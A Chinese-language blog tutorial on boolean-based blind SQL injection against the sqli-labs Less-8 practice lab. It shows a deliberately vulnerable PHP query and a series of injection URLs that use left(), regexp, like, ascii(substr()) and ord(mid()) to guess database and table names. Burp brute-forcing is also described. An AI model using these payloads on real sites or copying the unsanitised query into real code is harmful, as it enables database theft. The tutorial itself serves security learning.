5.布尔盲注

最新推荐文章于 2024-04-09 10:02:21 发布
最新推荐文章于 2024-04-09 10:02:21 发布
阅读量536 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21237971/article/details/108235954
版权

注入我们已经有了简单的概念,然而,就是在sql注入过程中,某些sql语句的执行结果被程序限制不回显到前端,这时候我们只能用一些别的方法进行判断或者尝试,这个判断或尝试过程就叫盲注。

什么是布尔盲注

布尔是判断真假,那么布尔盲注就是通过判断真假的方式来判断或尝试的注入攻击

<?php
error_reporting(E_ALL&~E_WARNING);	//设置错误等级至WARNING不报错
include("../sql-connections/sql-connect.php");	//引入sqlilabs配置文件连接数据库
$id = $_GET['id'];
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
	echo "Right";
}
else{
	echo "Wrong";
}

来看一个简单的例子,这代码简单来说就是如果执行成功打印Right,失败了打印Wrong。他不会再去打印过多的错误信息,这个时候我们就需要通过构造语句,来判断数据库信息的正确性,再通过页面返回的真假来识别我们判断的是否正确

布尔盲注的方法

构造逻辑判断语句,判断信息真假,取出所有的真值,实现SQL注入

判断注入点

首先判断注入点,盲注是没有直接的回显的,我们需要判断页面是否能够正常显示来确定注入点

http://127.0.0.1/Less-8/?id=1

页面正常显示

image-20200729111014915

http://127.0.0.1/Less-8/?id=1'
http://127.0.0.1/Less-8/?id=1' and '1' ='2

页面不显示

image-20200729111045570

http://127.0.0.1/Less-8/?id=1' and '1' ='1

页面再次正常显示

image-20200729111014915

说明这里就是注入点

常用方法

left0函数

left(database(),1)>'s'

database()显示数据库名称,left(a,b)从左侧截取a的前b位

http://127.0.0.1/Less-8/?id=1' and left((select database()),1)='s'-- #

我们使用第八关来测试

image-20200725143012557

当前库名字的第一位如果为s则显示,不是s则不返回

我们导入burp进行爆破测试,爆破点还是测试数据s

image-20200725161625813

然后直接进行爆破,查看返回长度,发现数值为s的时候,与其他的不相符合,然后再次进行爆破

修改代码为

http://127.0.0.1/Less-8/?id=1' and left((select database()),2)='sa'-- #

将sa的a作为爆破点,直到爆出完整名称

regexp

select user() regexp '^r'

正则表达式的用法,user()结果为root,regexp为匹配root的正则表达式

mysql正则表达式:https://www.runoob.com/mysql/mysql-regexp.html

^表示匹配输入字符串的开始位置,即从输入开始判断字符串

http://127.0.0.1/Less-8/?id=1' and (select database()) regexp '^se'-- #

意思是前两位是se开头(也可以s开头),如果是则返回You are in…,不是则不返回

image-20200730161027178

在里面可直接增加字符

对数据表进行布尔盲注爆破

http://127.0.0.1/Less-8/?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 0,1) regexp '^se'-- #

image-20200730161854574

like

select user() like 'ro%'

与regexp类似,使用like进行匹配

http://127.0.0.1/Less-8/?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 0,1) like 'e%'-- #

以e开头,如果是则返回You are in…,不是则不返回

subst()函数和ascii()函数

ascii(substr((select database()),1,1))=98

substr(a,b,c)从b位置开始,截取字符串a的c长度。ascii()将某个字符转换为ascii值,使用ascii值可以绕过一些不能使用单引号的场景

字符串截取后比较ascii

http://127.0.0.1/Less-8/?id=1' and ascii(substr((select database()),1,1))=115-- #

s的ascii码是115,所以这里能够正常返回

image-20200730172224632

ord()函数和mid()函数

ord(mid((select user()),1,1))=114

mid(a,b,c)从位置b开始,截取a字符串的c位ord()函数同ascii(),将字符串转为ascii值,由于使用方式同subst()函数和ascii()函数,就不再演示了

1598410879419)]

ord()函数和mid()函数

ord(mid((select user()),1,1))=114

mid(a,b,c)从位置b开始,截取a字符串的c位ord()函数同ascii(),将字符串转为ascii值,由于使用方式同subst()函数和ascii()函数,就不再演示了

kinghtxg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
布尔盲注
m0_52880296的博客
05-06 4033
一.布尔盲注原理: 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false, 构造SQL语句, 利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false, 从而达到注入的目的来获取信息的一种方法 没有错误提示 也没有回显 但是输入错误的话页面会有反应 也就是说 只有 true 和false 例如 :sql-labs /less-7 它只有两种提示 所以可以用布尔盲注 playload:and length(databas
什么是布尔盲注?学到了
m0re's blog
03-08 2630
周一晚上学长给我们讲了布尔盲注和时间盲注布尔盲注 布尔盲注为什么叫布尔盲注,看下概念 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。 基于布尔盲注 Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。 明白了,True和False都是布尔类型,...
sql注入之布尔盲注
最新发布
weixin_45653478的博客
04-09 1363
id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=117 --+ 爆的i。例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a。substr(abcd,2,1) 从第二位开始,截取一个字符,就是b。抓包并发送intruder。设置多个payload集合。
深入浅出带你学习布尔盲注
bluemoon_0的博客
02-13 188
深入浅出带你学习布尔盲注
mysql计算字段值的长度之LENGTH和CHAR_LENGTH区别
dj1540225203的博客
11-22 434
MySql计算字段的长度 用户账号有用中文字符,查找所有含有中文字符的账号 SELECT member_name FROM table_member WHERE length(member_name)!=char_length(member_name) 1 LENGTH mysql里面的 “LENGTH” 函数是一个用来获取字符串长度的内置函数 CHAR_LENGTH 在my...
MISC杂项时间盲注布尔盲注脚本 鹤城杯
qq_49746811的博客
10-10 1502
0x01 流量分析 本人web狗一只,最近学了一些网络协议方面的 所以做了一下MISC的两道流量分析,大佬们都觉着太简单没放脚本,我就放一下自己下的(小菜鸡勿喷) <--第一道流量分析不难,主要就是布尔盲注的流量包分析,直接查看http请求 包即可我们可以通过观察看到注入成功的响应长度不同,这里成功的为978字节 失的为994字节.不要问为什么.其实也可以直接判断.978的流量比994的少了 非常多 显然就是成功的(因为这里是获取ASCII码.所以判断成功的流量肯定更少) 所以我们只需要提取出这一部
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现...
web安全的学习之路(五)
water的博客
04-30 386
SQL注入之布尔盲注什么是布尔盲注布尔盲注的攻击方法使用工具爆破 什么是布尔盲注 上一篇文章介绍了union的注入攻击,这次来介绍一下布尔盲注。 在注入时,我们输入代码,期望能够让数据库中的数据被我们所查询到,但是,有的时候,网页返回的结果并不是如我们所愿,当我们尝试查询数据库中的信息的时候,页面总是只返回两个结果——语句执行或者没有执行。这时候,就需要使用到布尔盲注的方式了,通过穷举的方式一步步...
SQL 注入漏洞(六)布尔盲注
不秃头的程序Yang
06-11 1106
二、判断盲注
SQL盲注--布尔盲注
Auroraxsn的博客
04-27 2940
一、布尔盲注 1.特征: 某些网站输入参数后会判断,然后根据结果是或非返回页面。即普通注入只会返回其他页面,并没有回显 2.解决原理: 用函数(regexp,like,ascii,left,ord,mid,length)猜相关信息,正确时与错误时返回页面不一样,根据返回的页面来判断正确的数据信息。 3.基本流程 (1.判断注入类型 (2.判断列数 (3.获取数据库长度 构建有关数据库名的表达式,看页面返回情况判断表达式对错 length(str) 函数,返回字符串的长度 ...
渗透测试-SQL注入之布尔盲注和时间盲注
lza20001103的博客
04-20 2795
渗透测试-SQL注入之布尔盲注和时间盲注
SQL注入-盲注布尔盲注与时间盲注
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
SQL盲注攻击技术综述
扉葉的技術空間
02-15 1991
这几日整理一些以前看过的网路文章,替一些比较冷门的站点做备份,也许以后会再阅读到 // Blind SQL Injection Techniques: A Survey  Abstract: This paper gives a survey of current Blind SQL Injection Techniques. It first introduces th
sql靶场练习笔记3
qq_61109509的博客
02-08 2838
Less-8 基于’的盲注 先看是否存在注入点 ?id=1 页面正常 ?id=1' 页面异常,没有任何显示存在注入点 方法一 布尔盲注 1.left()函数:left(database(),1)='s’ left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0。 例:left(database(),1)=‘s’; 前1位是否是s。 2.regexp函数:select user() regexp 'r’ user()的结果是root,regexp为匹配root的正则表.
sqlmap布尔盲注
08-10
布尔盲注是一种利用布尔逻辑运算进行SQL注入的技术。在布尔盲注中,攻击者通过构造特定的SQL语句,通过判断某个条件的真假来获取数据库中的信息。 SQLMap是一款常用的自动化SQL注入工具,可以帮助安全测试人员快速发现和利用SQL注入漏洞。在使用SQLMap进行布尔盲注时,你需要提供目标URL、参数名、注入点等信息。SQLMap将自动发送不同的SQL语句,根据程序返回的结果来判断条件是否成立,并进一步推测数据库中的信息。 下面是使用SQLMap进行布尔盲注的一般步骤: 1. 执行基本扫描:通过指定目标URL和参数名,执行基本的SQL注入扫描,以确定是否存在注入漏洞。 2. 确定注入点:如果基本扫描成功,SQLMap将会尝试确定具体的注入位置。 3. 进行布尔盲注:在确认注入点后,SQLMap将自动生成相应的布尔盲注语句,并发送给目标服务器。通过观察服务器返回的页面内容或响应码,SQLMap将根据条件的真假来判断数据库中的信息。 4. 获取数据库信息:如果布尔盲注成功,SQLMap可以继续获取数据库的表名、列名、数据等敏感信息。 需要注意的是,使用SQL注入工具进行测试时,请确保已经得到合法授权,并遵守法律和道德规范。此外,使用自动化工具可能会对目标服务器造成不必要的负载,所以在使用时应谨慎操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值